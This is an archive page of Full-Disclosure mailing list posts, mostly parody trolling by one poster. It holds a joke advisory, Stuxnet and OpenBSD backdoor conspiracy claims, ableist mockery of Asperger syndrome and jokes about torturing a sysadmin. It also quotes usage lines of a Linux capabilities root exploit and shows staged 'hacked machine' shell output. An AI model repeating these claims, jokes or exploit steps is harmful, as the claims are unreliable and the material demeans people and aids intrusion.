>
> 1.) MustLive is primarily a web-application specialist (for the sake of
> argument)
> 2.) The vulnerabilities he finds are of a class of vulnerabilities that are
> most common in his field. (Consider: someone searching for vulnerabilities
> in internet services directly and doing the binary analysis will primarily
> be finding buffer or stack overflows, right? In web security, XSS and SQL
> injection (as well as others I'm undoubtedly forgetting -- I am *NOT*
> counting "not using a CAPTCHA" here, see next item) are the most common
> vulnerabilities, given the lack of binary code to overwrite)
> 3.) Every so often he posts a vulnerability of questionable risk in the form
> of "anti-automation" which is essentially a fancy way of saying "ha ha they
> don't use CAPTCHA." I don't consider that a vulnerability so much as an
> opening for annoyance; I suppose your mileage may vary.
>
> My guess is that there's a thought that web apps are far easier to crack at
> than binaries, so vulnerabilities are easier to find, therefore don't waste
> time finding something that's "useless." That may be, in some cases, but
> sometimes a vulnerability in the web app destroys the entire chain, so to
> speak.
>
> Thoughts?
>
> -Zach

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Best Buy and Privacy?

2011-02-04 Thread Григорий Братислава
2011/2/4  :

> Yes, "Barbie's Horse Adventure" certainly is terrorism.  Why do
> the game manufacturers hate our way of life?
>


with all due is respect in order; is words like "horse adventure"
followed by "hate our way of life" is left with full disclosure list
wondering about potential zoophile on list. this is not even mention
girly game is in itself Boris Moiseev'ish
http://en.wikipedia.org/wiki/Boris_Moiseev

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] Best Buy and Privacy?

2011-02-04 Thread Григорий Братислава
Hello full disclosure!!

  i is like to warn you about is consumer profiling. As is thor state:
"they have to send all this information to the Seattle police in case
any of the titles I turned in were reported stolen by someone" So I is
must warn you now!!

  law enforcement is agencies is concerned with this is information in
order to stop terrorism. is we now think of this reason for police is
need information, we only need to look in movie se7en with brangelina
pitt and morgan fairchild, in part where is blackie tell tyler durden:
"he is give me all information for library books, everyone is keep
records!!"

  deductive reasoning is state:

i) user turn in 100s of games (high likelihood of stolen property,
seller needs money for crank)
ii) 100s is of games are all terrorist games (is proof in titles:
Fallout, Modern Warfare, Grandtheft Auto, Saints Row, Resident Evil)
iii) anyone is with such propensity for violent titles must also
listen to rap music, alternative, industrial or is make their own
music
iv) police is needed to investigate these people

  is proof system works:

i) user tries to turn in games with expired license (check thor is do this)
ii) title is 'pimp my ride' is likely to be game where pimp sell whore
iii) is established thor make his own music on his website
iv) is need to further investigate thor as he graduates from violent
video games, to angry music, to studying serial killer dexter

  musntlive is now warn all parents: 'save your is children from
violent video games, angry music and violent televisions else if not,
there is consequence: http://en.wikipedia.org/wiki/Charles_Manson'

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


[Full-disclosure] MSNLVADV-2010-001 Security Advisory

2011-01-21 Thread Григорий Братислава
__
- MSNLVADV-2010-001 --

 MusntLive Lame ASCII ART ADVISORY
__
__


   || __   ||
   ||=\_`\=||
   || (__/ ||
   ||  | | :-"""-.
   ||==| \/-=-.   \
   ||  |(_|o o/   |_
   ||   \/ "  \   ,_)
   ||\ U  /__/
   || ;--'  `-.
   ||/  .  \
   ||===;\  \
   ||   | | |
  ___\"""'   _/_/
 (~|___ |  (_  \
   /  .' ( | )   \\_/
  |_ / |||  |\\
 /  _)=|||  | ||
/  /|  ||/  / //
\_/||  ( `-/ ||
   ||==/  /  \\ .-.
   ||  \_/\'-'/
   ||  ||  `"`
   ||==||
   ||  ||

__
__

  Title:  MUSNTLIVE LAME ASCII ART ADVISORY
  Severity:   High/420
  Advisory ID:MSNLVADV-2010-001
  Found Date: 01.04.1998
  Date Reported:  01.04.1998
  Release Date:   20.01.2011
  Author: MUSNTLIVE
  Affected Component: IS WANNA BE FUTURE CISSPs

  Remote Exploitable: Yes
  Local Exploitable:  Yes
  Patch Status:   ELECTRO CONVULSIVE SHOCK THERAPY IS NOW ILLEGAL
  Discovered by:  MUSNTLIVE
  Thanks to:  pizdascriptkiddys



Background:
===

ASCII art is was stupid show of stupid talent. Is now must in use by
lame scriptkiddys who is must want to scare industry into is think
that advisor is super security Yakov Smirnov. You is not funny!!


Proof is Concept



  ''  ''
  ||  ||  (( .|'',  '''|.  '||''| '||  ||`
  ||  ||   `'') `'') ||.|''||   || `|..||
 .||..||. `...'`...' `|..' `|..||. .||.||
,  |'
 ''

 '||   '||
  ||||
  ||''|,  '''|.  .|'',  || //`  .|''|, '||''|
  ||  || .|''||  || ||<<||..||  ||
 .||  || `|..||. `|..' .|| \\.  `|...  .||.



   '||`
||
 '||''| .|''|,  ||  .|''|,  '''|.  ( .|''|,
  ||||..||  ||  ||..|| .|''||   `'') ||..||
 .||.   `|...  .||. `|...  `|..||. `...' `|...



 ||`
 ||  ''
  '''|.  .|''||  \\  //  ||  ( .|''|, '||''| '||  ||`
 .|''||  ||  ||   \\//   ||   `'') ||  ||  || `|..||
 `|..||. `|..||.   \/   .||. `...' `|..|' .||.||
   ,  |'
''

   || ||
   || ||
 '||  ||` .|''|, ( || ||
  `|..||  ||..||  `'')
  ||  `|...  `...' || ||
   ,  |'
''



Solution:
=

USA is style Waterboard torture is user of ASCII

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] Getting Off the Patch (is pointing out obvious)

2011-01-18 Thread Григорий Братислава
прежде всего я никогда не говорил, что я был русским, каждый
предполагает, что я. Я мог быть, полируют, шведский язык, китайский
язык вообще, я хочу быть. если Вы не поняли это все же, то Вы - дурак,
как - другие здесь.

יתר על כן איך אתה יודע שאני לא עובד הישראלי כיסוי עמוק בריגול עבור
המוסד במקרה כמו אה גדי עברון? איך אתה יודע שאני לא כותב stuxnet או
לפרוץ את האחיות שלי iPad? איך אתה יודע שאני לא האקר הגדול ביותר על פני
כדור הארץ בסמוך אוונס גרגורי או Lamo אדריאן

Betrug die Endgrenze!!
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Getting Off the Patch (is pointing out obvious)

2011-01-18 Thread Григорий Братислава
2011/1/18 huj huj huj :
> Меня бесит твая бесконечная болтовна

Я спрошу Вас вежливо, каждый в последний раз оставляет мою нить в
покое. является ничто, чтобы видеть здесь не проходит прежде, чем усы
valdi уменьшаются
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Getting Off the Patch (is pointing out obvious)

2011-01-18 Thread Григорий Братислава
2011/1/18 andrew wiggin :
> Очевидно, что вы на самом деле не пытаются узнать что-нибудь здесь.
> Все, что Тора и Пит сказал стоит золото. Vladis также иногда хорошо,
> чтобы читать. Тор является звезда, все, что он пишет заслуживает того,
> чтобы читать. Не могли бы вы не утруждая себя эту тему с такой глупый
> вопрос, для которых вопрос "да"?
>

ждите!! у кого спрашивал ад, Вы для вашего мнения выходите из моей беседы
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Getting Off the Patch (is pointing out obvious)

2011-01-18 Thread Григорий Братислава
2011/1/17 Cal Leeming [Simplicity Media Ltd]
:
> Please reply in Russian, and I'll get one of my colleagues to translate.

так как Вы хотите русский язык, вот - некоторые российские заголовки
от местных новостей lulululul

А несколько дней назад начальник управления ЗАГС Москвы Ирина
Муравьева, подводя итоги прошлого года, лишь подтвердила всероссийскую
статистику. По ее словам, только 70 процентов маленьких москвичей
родились в официально зарегистрированных семьях. Если учесть, что
всего в столице было зарегистрировано 123,638 тысячи новорожденных, то
как минимум 400 тысяч из них оказались внебрачными.

Далеко не всегда речь идет о неполных семьях и мужчинах, которые
сбежали от подруги, узнав о ее интересном положении, просто сейчас
многие влюбленные не считают, что официальная регистрация их союза
укрепит внутрисемейные отношения. "Мы завели ребенка, разве это не
говорит о том, что у нас все по-настоящему серьезно?" -- утверждают
семьи без штампа, пеняя на бесчисленные количество своих друзей,
которые разбежались через три-четыре года официальной семейной жизни.
Кроме того, "неоформленные" супруги говорят, что их жизнь честней, так
как в ее основе лежат чувства, а не пресловутая обязанность по закону.

Несмотря на все возрастающую тенденцию так называемых "гражданских"
браков (юридически означает зарегистрированный брак между двумя
людьми, но в быту употребляется как синоним "фактического"), у такого
образа жизни есть множество противников, которые утверждают, что жить
вместе и растить общих детей без похода в ЗАГС не то чтобы плохо, а
просто небезопасно. При определенных обстоятельствах, если пара
разойдется или с одним из партнеров случится какое-то несчастье,
вторая половина и ребенок могут остаться без кола и двора. Раз
отношения не оформлены официально, то и претензий на наследство быть
не может.

Еще один интересный момент: некоторое время назад европейские
психологи провели масштабное исследование с целью выяснить, в каких
семьях -- официальных или неофициальных -- лучше живется детям.
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Getting Off the Patch (is pointing out obvious)

2011-01-18 Thread Григорий Братислава
2011/1/17 Cal Leeming [Simplicity Media Ltd]
:
> I have absolutely no idea what you just said lol.
> This part was especially amusing:
> "Is when we tie up Pawel in lobby with is cable to car battery example is
> set".
> Please reply in Russian, and I'll get one of my colleagues to translate.

не предполагайте, что я - российский идиот даже тип русских, более
шикарный чем я. это находится в Америке, что Вы называете ложным
флагом, и предназначается, чтобы отбросить идиотов как Вы от
понимания, я являюсь фактически китайским.

Заметьте, как я никогда не могу произносить письмо R и вместо этого
использовать письмо L??!! даже самые основные напевают, поймал это
несоответствие.
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Getting Off the Patch (is pointing out obvious)

2011-01-17 Thread Григорий Братислава
2011/1/17 Cal Leeming [Simplicity Media Ltd]
:
> I have absolutely no idea what you just said lol.
> This part was especially amusing:
> "Is when we tie up Pawel in lobby with is cable to car battery example is
> set".
> Please reply in Russian, and I'll get one of my colleagues to translate.


Оставьте меня в покое Хуй тебе в роть!!

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] Getting Off the Patch (is pointing out obvious)

2011-01-17 Thread Григорий Братислава
On Mon, Jan 17, 2011 at 4:30 PM, Cal Leeming [Simplicity Media Ltd]
 wrote:
> Okay, so there's like 40 odd rather long responses to this discussion, can
> someone give a one word answer as to whether or not they are worth taking
> the time to read through?

  Is obvious you is not in this game to learn therefore I ask that you
leave. All is say by both Thor and is Pete is worth is weight on gold.
Valdis, is sometimes maybe yes good to read. Thor is shark, is worth
reading to is learn from everytimes. Please, is no bother this thread
or list with such stupid answers yes?

  Is musntlive has better solution for no is patching. Unplug is your
network and then is all you worry about is local threat. With enough
waterboarding, is one can defend against the local attack vectors, for
is example:

  Pawel is system administrator for is catch him doing something
sneaky. Is when we tie up Pawel in lobby with is cable to car battery
example is set. Other workers is now know: "Data is private as used to
be his balls. Pawel is like seeing other people's data, is now we see
his data. Look at Pawel when we is touch is two battery terminals!!

  Maybe must change slogan: -- "InSecurity -- is we not play this is
game!!" (TM musntlive 2011)

[ WARNING -- FULL DISCLOSURE: -- Pawel was is not harmed during is
typing of is email I write you. His name is for only scenario purposes
only. DISCLAIMER: -- NO IS WORKERS, COWORKERS, CONTRACTORS, IS THIRD
PARTY VENDORS WAS IS HARMED DURING IS TYPING OF IS LETTER. ANY IS
RELATED INJURIES IS HEREBYTOFORTHOU COINCIDENTAL. MUSNTLIVE IS IS NOT
RESPONSIBLE FOR IS CLAIMS IS MADE BY ANYONE IS AFTER 17 JAN 2011 00:48
]

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] Getting Off the Patch

2011-01-17 Thread Григорий Братислава
On Mon, Jan 17, 2011 at 12:24 PM, Thor (Hammer of God)
 wrote:
> (top posting)
>
> So, you have no data to support your claim other than "I think that sucks, so 
> this must be better."  Thanks.
>
> t

Hello full disclosure!!

  I is like to warn you about not having backup to is support claims
when responding to Thor. He is will eat you like акула.

  Is I say this now with musntlive supported data: -- 'I is think that
sucks so is my solution is better 'for me' and is Thor no like I has
friend name Bloodaxe and is no, I not speak of Chris Coogans

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] Free Dancho Movement

2011-01-17 Thread Григорий Братислава
Hello Full-Disclosure!!

 I is like to talk with you for serious issue affecting hackers is
around the world. Assburgers Syndrome.

 Is say by Wiki -- 'Asperger syndrome or Asperger's syndrome is an
autism spectrum disorder that is characterized by significant
difficulties in social interaction, along with restricted and
repetitive patterns of behavior and interests. It differs from other
autism spectrum disorders by its relative preservation of linguistic
and cognitive development. Although not required for diagnosis,
physical clumsiness and atypical use of language are frequently
reported.'

 Is now explained by mustnlive -- 'Assburgers Syndrome is a
relevantly new is syndrome more frequently is in used by is wanna-be
hackers who is under arrest, investigation. Is defensive posture used
by creative malicious hackers who is has no social interaction other
than is use of IRC, mailing-list, phpBB and is of course full
disclosure. Although is not required for diagnosis, Assburgers
sufferers are is usually pathological liars and scam artists who is
been has been caught with warez, carding, etc, and is now are in hot
water with authority.

 Is say by Wiki -- 'The exact cause is unknown, although research
supports the likelihood of a genetic basis; brain imaging techniques
have not identified a clear common pathology. There is no single
treatment, and the effectiveness of particular interventions is
supported by only limited data.'

 Is now explained by musntlive -- 'The exact cause is a case of is
guilty by is reason of stupidity. Although is research is may support
or is conclude brain deficiencies, for wannabe hackers like Adrian
Lamo, Gary McKinnon and now is Dancho, this is not case. musntlive
studies say is these pizda hackers is just stupid and is no way
Assburger victims.

 Is say by Wiki -- Some researchers and people with Asperger's have
advocated a shift in attitudes toward the view that it is a
difference, rather than a disability that must be treated or cured.'

 Is now explained by musntlive --'As is was read on good blog
(http://phil251.eripsa.org/?p=1281) brains is must not be separated
from their is respective bodies. Musntlive is believe by means of
waterboarding and is or neurologically is transplant monkey brain with
Adrian Lamo brain, Adrian is stop lying and selling out friends. In is
event of Gary McKinnon (so1o) is replace his brain with Jar Jar Binks
is resolve his nuisance use of Star Wars 1337ed nicknames. As is case
of Dancho, who is likely being hospitalized against is his will,
understand that is hospitals only forcefully is hospitalize the most
dangerous types. Is mean Dancho is schizophrenic. He is not need help
as when he is released he is now have full deniability -- 'it was not
me it was my other half''

 Please full disclosure do not is feed the trolls. Free Dancho!
Everyone is know cyberorganizedIscrime organizations with is much
power is have him committed! Is not like is easier to run him over, no
answer is to leave a record trail of having him committed. Assburgers
is real is what will you do when КГБ is come knocking for you? Is
obvious play dead!! I is like to say more but is maybe someone tapping
entire techno.ru

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] The OpenBSD IPsec-Stuxnet connection.

2011-01-17 Thread Григорий Братислава
Is nothing to see please do not feed troll. Everyone is see different
picture. Stuxnet is make by Russian coders who is was hired to work on
systems. Is you use maltego to connect the dots is via domains used,
is you see real picture of nuclear blackmail. Israel and US is use
someone elses work to take credit for. What is not seen or known is,
Russian coders now living in New Zealand is responsible for this
attack [shhh no tell the world the truth].

Is imagine for is moment you hijack complete nuclear facility without
care of possible fallout from accident. As criminal you is has nothing
to worry about. As government, is you cause an Iranian Chernobyl, you
is will have to deal with entire world. Do not be fooled. Jason is has
no time for Stuxnet as is obvious he is has been busy hiding his
backdoor from discovery

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


[Full-disclosure] Remedy for Getting Off is Patch

2011-01-14 Thread Григорий Братислава
Hello full disclosure!!!

   I'd like to warn you about Patches.  As is everyone knows,  patches
is are pieces of is software that software manufacturers is make to
fix their is horrendous programs.  Is you not patch,  you is get
owned.  Gone is under sixty seconds.

As is say on Wikipedia  --  "A security patch is a change applied to
an asset to correct the weakness described by a vulnerability.  This
corrective action will prevent successful exploitation and remove or
mitigate a threat’s capability to exploit a specific vulnerability in
an asset.  Security patches are the primary method of fixing security
vulnerabilities in software.  Currently Microsoft releases its
security patches once a month, and other operating systems and
software projects have security teams dedicated to releasing the most
reliable software patches as soon after a vulnerability announcement
as possible.  Security patches are closely tied to responsible
disclosure."


   As in say by musntlive  --  "A security patch is is a change
applied is to an asset is to correct ignorance and stupidities of
developers of is application because is their application is
ownerizable.  This is corrective action and is nothing more than is
bandaid to prevent temporary exploitation and is remove vulnerability
for short amount of is time.  Security patches is only method of
vendors like is Microsoft is to cover their осёл.  'Is we is Microsoft
and is sure we make sloppy software.'  All software is beta присоска!
And is you is stupid for buying is software.  Security patches is
closely tied with sloppy coding and is rushing to market."

  Is argue by Thor (who is musntlive respect) as is is arguement by
Valdis (who is musntlive respect is усы) is Pete Herzog (who is
musntlive respect) say:  'defense in depth'  --  "the more reason to
implement an array of controls (defense in width) for the interactive
points rather than rely on patches to fix ONLY the problems you know
about."  Now is musntlive lay smack down on is everyone even is I
respect all of you.

  Is Pete you must understand is I pay $40,000.00 or give 10,000
little сурок trade for software  -  I is expect software to is work
how I want is work.  I is build my business on is this application so
when is code is changed now I is has to maybe accept it yes or is not
accept it.  Is I accept is change is software maybe break my system
and is cost me money or possibly worse сурок!! Is who присоска
now!!??!!??

  Is patch no answer!!  Because is New Year musntlive offers everyone
fair solution to is fix:  OpenBSD.  Now is when you have security
issues since is your machine backdoored is you can ask Theo or the FBI
to fix is your machine.


Thank is you all for support in 2011

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Getting root, the hard way

2011-01-05 Thread Григорий Братислава
>  * Usage:
>  * gcc -w caps-to-root.c -o caps-to-root
>  * sudo setcap cap_sys_admin+ep caps-to-root
>  * ./caps-to-root


Is further you fail because why see above:

>  * sudo setcap cap_sys_admin+ep caps-to-root

Is I had sudo for why I has to run this code when I can sudo su. Is
you must change advisory to "это пиздец!! Lame Race Condition for You
Is Already Has Root"

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Getting root, the hard way

2011-01-05 Thread Григорий Братислава
Is code no work:

# uname -a
OpenBSD cyka.etopizdets.ru 4.7 WRIGHTKERNEL#1337 i386
# md5 danposerberg.c
MD5 (danposerberg.c) = 26b1dd146a3b96c63539f551a8741f18
# gcc danposerberg.c -o hakaruski
danposerberg.c:53:30: linux/capability.h: No such file or directory
danposerberg.c: In function `main':
danposerberg.c:155: error: `PF_PHONET' undeclared (first use in this function)
danposerberg.c:155: error: (Each undeclared identifier is reported only once
danposerberg.c:155: error: for each function it appears in.)
danposerberg.c:173: warning: assignment makes pointer from integer
without a cast
danposerberg.c:174: warning: assignment makes pointer from integer
without a cast
danposerberg.c:191: error: `MAP_ANONYMOUS' undeclared (first use in
this function)
danposerberg.c:200: warning: assignment makes integer from pointer
without a cast
danposerberg.c:204: warning: assignment makes integer from pointer
without a cast
danposerberg.c:208: warning: assignment makes integer from pointer
without a cast
danposerberg.c:231: warning: assignment makes pointer from integer
without a cast
# iswhere capability.h
ksh: iswhere: not found
# whereis capability.h
# emacs danposerberg.c
# gcc -w danposerberg.c -o fixeruski
danposerberg.c:53:30: linux/capability.h: No such file or directory
danposerberg.c: In function `main':
danposerberg.c:155: error: `PF_PHONET' undeclared (first use in this function)
danposerberg.c:155: error: (Each undeclared identifier is reported only once
danposerberg.c:155: error: for each function it appears in.)
danposerberg.c:191: error: `MAP_ANONYMOUS' undeclared (first use in
this function)
# ed danposerberg.c
# gcc -o fixeruski danposerberg.c
# ./fixeruski
SEGMENTATION FAULT
Is no work!! Is your machine is already backdoored see uname output


So i is retest to Linux machine:

$ uname -a
Linux pizda 2.6.29.4 #1 SMP Thu Dec 21 10:57:32 EDT 2003 i386 GNU/Linux
$ echo "is test for backdoors in code" && ruby -pe 'next if not
/jason|open|theo/' danposerberg.c
$ echo "code is been test for openbsd backdoors!! is no backdoors"
$ gcc -o fixeruski -w danposerberg.c
$ ./fixeruski
^C
^C
^C
^C
^C
^C
^C
^Z
^Z^Z^Z^Z^Z
^Z^Z^Z^Z^Z^Z^Z^C^C^C^C^C
$

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


[Full-disclosure] Is Security Disclosure

2010-12-31 Thread Григорий Братислава
Hello Full Disclosure!!

I is like to warn you is about New Years worldwide.

Is time for to many is drink and drive. For this is MustnLive say: Is
be safe this is New Years, don't is drink and drive because is you
might is spill drink.

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


[Full-disclosure] FreeBSD backdoor full disclosure

2010-12-28 Thread Григорий Братислава
Is MusntLive listen to Винт И Мэф, Rena, Timati and Mad-A is morning
MusntLive realize is he is too real for is game and is come to
conclusion that is people is know MusntLive on security point [is most
real]!! So while is many think to make fun of MusntLive, is MusntLive
get last laugh. Is people say is 'OMG MusntLive is not outted FreeBSD
nor NetBSD' troll statement, is people who not understand is coding
port process for to OpenBSD from FreeBSD. Is people say 'OMG is
MusntLive is not speak of FreeBSD or Linux so is he must be jealous
zealot' and is is not true. MusntLive is has been always is operating
system neutral and is no support one OS over is another!!

So is for the not knowing I break it down: OpenBSD is been rumored to
have backdoor. Is we go back and look at disclosure we is see accuser
is say 'OpenBSD developers is was paid..' This is mean that is so what
code is come from FreeBSD, is not FreeBSD developer[s] who is backdoor
code. Is OpenBSD and is do so under Theo's eye!!

Is question: 'I is created code.c and I is release it. Paul Schmehl is
come and take code.c and is backdoor it.'

a) Is I to is blame?
b) Is Schmehl responsible for is backdoor
c) Is my whole developmenter team is responsible

Answer is of course is b). Is Paul Schmehl is only responsible. Do not
is feed trolls full disclosure. For is people like Dave Nett, Paul
Schmehl and is handful of is others who is must make confused on is
real security issue. Paul do not backdoor is code he commit for is
because he is good guy. Old and senile for is true but is has morals.

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] backtrack-linux.org hacked?

2010-12-27 Thread Григорий Братислава
I is also hack machine is too!!



 |  ||o
 |---.,---.,---.|__/ ,---.,---..   .,---.|__/ .
 |   |,---|||  \ |---'||   |`---.|  \ |
 `   '`---^`---'`   ``---'``---'`---'`   ``


gary7> uname -a
SunOS gary7 5.8 Generic_108528-21 sun4u sparc SUNW,Ultra-Enterprise-1

gary7> uname -X
System = SunOS
Node = gary7
Release = 5.8
KernelID = Generic_108528-21
Machine = sun4u
BusType =
Serial =
Users = 8
OEM# = 0
Origin# = 1
NumCPU = 16

gary7> ifconfig | grep 208.
inet 208.47.125.33 netmask 0xfff8 broadcast 208.47.125.1

gary7> w
 3:58PM  up 275 days, 10:22, 5 users, load averages: 0.13, 0.09, 0.08
USER TTY  FROM  LOGIN@  IDLE WHAT
condorp6   67.210.226.207 20Dec10  2:31 -
assange p7   sbcp1.dhs.gov 3:40PM -
asinkov   p4   131.84.179.30   16Nov10  -

gary7> id
uid=1011(asinkov) gid=1011(asinkov) groups=1011(asinkov)

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


  1   2   >